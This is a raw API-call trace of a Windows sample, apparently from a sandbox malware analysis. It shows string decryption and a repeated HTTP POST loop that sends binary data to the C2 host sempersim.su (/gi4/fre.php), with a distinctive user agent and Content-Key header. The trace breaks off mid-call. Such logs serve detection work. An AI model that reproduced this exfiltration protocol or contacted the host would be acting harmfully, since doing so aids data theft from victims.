LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0263.936] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0263.936] GetProcessHeap () returned 0x5b0000 [0263.936] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0263.936] GetProcessHeap () returned 0x5b0000 [0263.937] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0263.937] send (s=0x3b0, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0263.937] send (s=0x3b0, buf=0x5d1e18*, len=159, flags=0) returned 159 [0263.937] GetProcessHeap () returned 0x5b0000 [0263.937] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0263.938] recv (in: s=0x3b0, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0265.103] GetProcessHeap () returned 0x5b0000 [0265.104] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0265.104] GetProcessHeap () returned 0x5b0000 [0265.104] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e88 | out: hHeap=0x5b0000) returned 1 [0265.104] GetProcessHeap () returned 0x5b0000 [0265.104] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0265.105] GetProcessHeap () returned 0x5b0000 [0265.105] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5dd8 | out: hHeap=0x5b0000) returned 1 [0265.105] closesocket (s=0x3b0) returned 0 [0265.106] GetProcessHeap () returned 0x5b0000 [0265.106] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa00 | out: hHeap=0x5b0000) returned 1 [0265.106] GetProcessHeap () returned 0x5b0000 [0265.106] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0265.106] GetProcessHeap () returned 0x5b0000 [0265.107] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3500 | out: hHeap=0x5b0000) returned 1 [0265.107] GetProcessHeap () returned 0x5b0000 [0265.107] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0265.107] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xc24) returned 0x3b0 [0265.109] Sleep (dwMilliseconds=0xea60) [0265.126] GetProcessHeap () returned 0x5b0000 [0265.126] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3548 [0265.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0265.127] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0265.133] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0265.134] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0265.156] GetProcessHeap () returned 0x5b0000 [0265.159] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8620 [0265.164] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0265.164] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c8620, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0265.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0265.165] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0265.166] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0265.166] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0265.166] GetProcessHeap () returned 0x5b0000 [0265.167] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8620 | out: hHeap=0x5b0000) returned 1 [0265.168] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0265.168] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3548, pdwDataLen=0xdfcfc | out: pbData=0x5d3548, pdwDataLen=0xdfcfc) returned 1 [0265.169] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0265.169] CryptDestroyKey (hKey=0x5be048) returned 1 [0265.169] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0265.171] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0265.171] GetProcessHeap () returned 0x5b0000 [0265.171] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d54c0 [0265.174] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0265.174] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0265.175] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0265.175] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0265.176] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0265.176] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0265.177] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0265.177] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0265.177] GetProcessHeap () returned 0x5b0000 [0265.177] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0265.194] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0265.194] GetProcessHeap () returned 0x5b0000 [0265.195] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0265.195] GetProcessHeap () returned 0x5b0000 [0265.195] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d54c0 | out: hHeap=0x5b0000) returned 1 [0265.195] GetProcessHeap () returned 0x5b0000 [0265.196] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3548 | out: hHeap=0x5b0000) returned 1 [0265.196] GetProcessHeap () returned 0x5b0000 [0265.196] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3308 [0265.197] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0265.198] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0265.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0265.210] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5cc8) returned 1 [0265.216] GetProcessHeap () returned 0x5b0000 [0265.216] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0265.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0265.217] CryptImportKey (in: hProv=0x5c5cc8, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0265.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0265.217] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0265.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0265.220] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0265.220] GetProcessHeap () returned 0x5b0000 [0265.221] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0265.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0265.221] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3308, pdwDataLen=0xdfcfc | out: pbData=0x5d3308, pdwDataLen=0xdfcfc) returned 1 [0265.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0265.222] CryptDestroyKey (hKey=0x5be048) returned 1 [0265.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0265.223] CryptReleaseContext (hProv=0x5c5cc8, dwFlags=0x0) returned 1 [0265.223] GetProcessHeap () returned 0x5b0000 [0265.223] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d4e48 [0265.224] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0265.224] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0265.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0265.225] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0265.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0265.226] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0265.226] GetProcessHeap () returned 0x5b0000 [0265.226] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0265.226] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdcc8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf308*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0265.227] GetProcessHeap () returned 0x5b0000 [0265.227] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa00 [0265.227] socket (af=2, type=1, protocol=6) returned 0x3b4 [0265.228] connect (s=0x3b4, name=0x5cf308*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0265.298] FreeAddrInfoW (pAddrInfo=0x5cdcc8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf308*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0265.298] GetProcessHeap () returned 0x5b0000 [0265.298] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5cc8 [0265.298] GetProcessHeap () returned 0x5b0000 [0265.298] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0265.299] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0265.300] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0265.300] GetProcessHeap () returned 0x5b0000 [0265.300] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0265.300] GetProcessHeap () returned 0x5b0000 [0265.300] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0265.300] GetProcessHeap () returned 0x5b0000 [0265.301] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d34b8 [0265.301] GetProcessHeap () returned 0x5b0000 [0265.301] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0265.301] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0265.302] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0265.302] GetProcessHeap () returned 0x5b0000 [0265.302] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0265.302] GetProcessHeap () returned 0x5b0000 [0265.303] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0265.303] send (s=0x3b4, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0265.303] send (s=0x3b4, buf=0x5d1e18*, len=159, flags=0) returned 159 [0265.303] GetProcessHeap () returned 0x5b0000 [0265.303] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0265.303] recv (in: s=0x3b4, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0266.499] GetProcessHeap () returned 0x5b0000 [0266.500] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0266.500] GetProcessHeap () returned 0x5b0000 [0266.500] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d34b8 | out: hHeap=0x5b0000) returned 1 [0266.500] GetProcessHeap () returned 0x5b0000 [0266.500] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0266.500] GetProcessHeap () returned 0x5b0000 [0266.501] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5cc8 | out: hHeap=0x5b0000) returned 1 [0266.501] closesocket (s=0x3b4) returned 0 [0266.502] GetProcessHeap () returned 0x5b0000 [0266.502] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa00 | out: hHeap=0x5b0000) returned 1 [0266.502] GetProcessHeap () returned 0x5b0000 [0266.502] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d4e48 | out: hHeap=0x5b0000) returned 1 [0266.502] GetProcessHeap () returned 0x5b0000 [0266.502] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3308 | out: hHeap=0x5b0000) returned 1 [0266.502] GetProcessHeap () returned 0x5b0000 [0266.503] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0266.503] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xc28) returned 0x3b4 [0266.521] Sleep (dwMilliseconds=0xea60) [0266.533] GetProcessHeap () returned 0x5b0000 [0266.533] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3398 [0266.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0266.534] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0266.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0266.542] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5910) returned 1 [0266.555] GetProcessHeap () returned 0x5b0000 [0266.555] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0266.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0266.557] CryptImportKey (in: hProv=0x5c5910, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0266.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0266.558] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0266.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0266.559] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0266.559] GetProcessHeap () returned 0x5b0000 [0266.559] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0266.560] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0266.560] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3398, pdwDataLen=0xdfcfc | out: pbData=0x5d3398, pdwDataLen=0xdfcfc) returned 1 [0266.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0266.561] CryptDestroyKey (hKey=0x5bde08) returned 1 [0266.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0266.565] CryptReleaseContext (hProv=0x5c5910, dwFlags=0x0) returned 1 [0266.565] GetProcessHeap () returned 0x5b0000 [0266.565] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0266.566] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0266.566] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0266.567] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0266.567] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0266.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0266.568] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0266.570] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0266.570] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0266.570] GetProcessHeap () returned 0x5b0000 [0266.570] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0266.570] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0266.570] GetProcessHeap () returned 0x5b0000 [0266.572] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0266.572] GetProcessHeap () returned 0x5b0000 [0266.572] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0266.572] GetProcessHeap () returned 0x5b0000 [0266.572] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3398 | out: hHeap=0x5b0000) returned 1 [0266.572] GetProcessHeap () returned 0x5b0000 [0266.572] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d2e40 [0266.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0266.573] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0266.581] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0266.581] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5998) returned 1 [0266.587] GetProcessHeap () returned 0x5b0000 [0266.587] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c86b0 [0266.588] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0266.588] CryptImportKey (in: hProv=0x5c5998, pbData=0x5c86b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0266.588] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0266.589] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0266.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0266.590] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0266.590] GetProcessHeap () returned 0x5b0000 [0266.590] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c86b0 | out: hHeap=0x5b0000) returned 1 [0266.591] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0266.591] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d2e40, pdwDataLen=0xdfcfc | out: pbData=0x5d2e40, pdwDataLen=0xdfcfc) returned 1 [0266.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0266.592] CryptDestroyKey (hKey=0x5be048) returned 1 [0266.593] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0266.593] CryptReleaseContext (hProv=0x5c5998, dwFlags=0x0) returned 1 [0266.593] GetProcessHeap () returned 0x5b0000 [0266.593] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5d60 [0266.596] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0266.596] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0266.597] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0266.597] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0266.598] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0266.598] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0266.598] GetProcessHeap () returned 0x5b0000 [0266.598] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0266.598] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5ce038*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0266.600] GetProcessHeap () returned 0x5b0000 [0266.600] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca950 [0266.600] socket (af=2, type=1, protocol=6) returned 0x3b8 [0266.600] connect (s=0x3b8, name=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0266.669] FreeAddrInfoW (pAddrInfo=0x5ce038*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0266.669] GetProcessHeap () returned 0x5b0000 [0266.669] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5998 [0266.670] GetProcessHeap () returned 0x5b0000 [0266.670] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0266.670] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0266.672] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0266.672] GetProcessHeap () returned 0x5b0000 [0266.672] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0266.672] GetProcessHeap () returned 0x5b0000 [0266.672] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0266.672] GetProcessHeap () returned 0x5b0000 [0266.672] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3620 [0266.672] GetProcessHeap () returned 0x5b0000 [0266.672] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0266.673] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0266.674] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0266.674] GetProcessHeap () returned 0x5b0000 [0266.674] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0266.674] GetProcessHeap () returned 0x5b0000 [0266.674] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0266.674] send (s=0x3b8, buf=0x5cc0b0*, 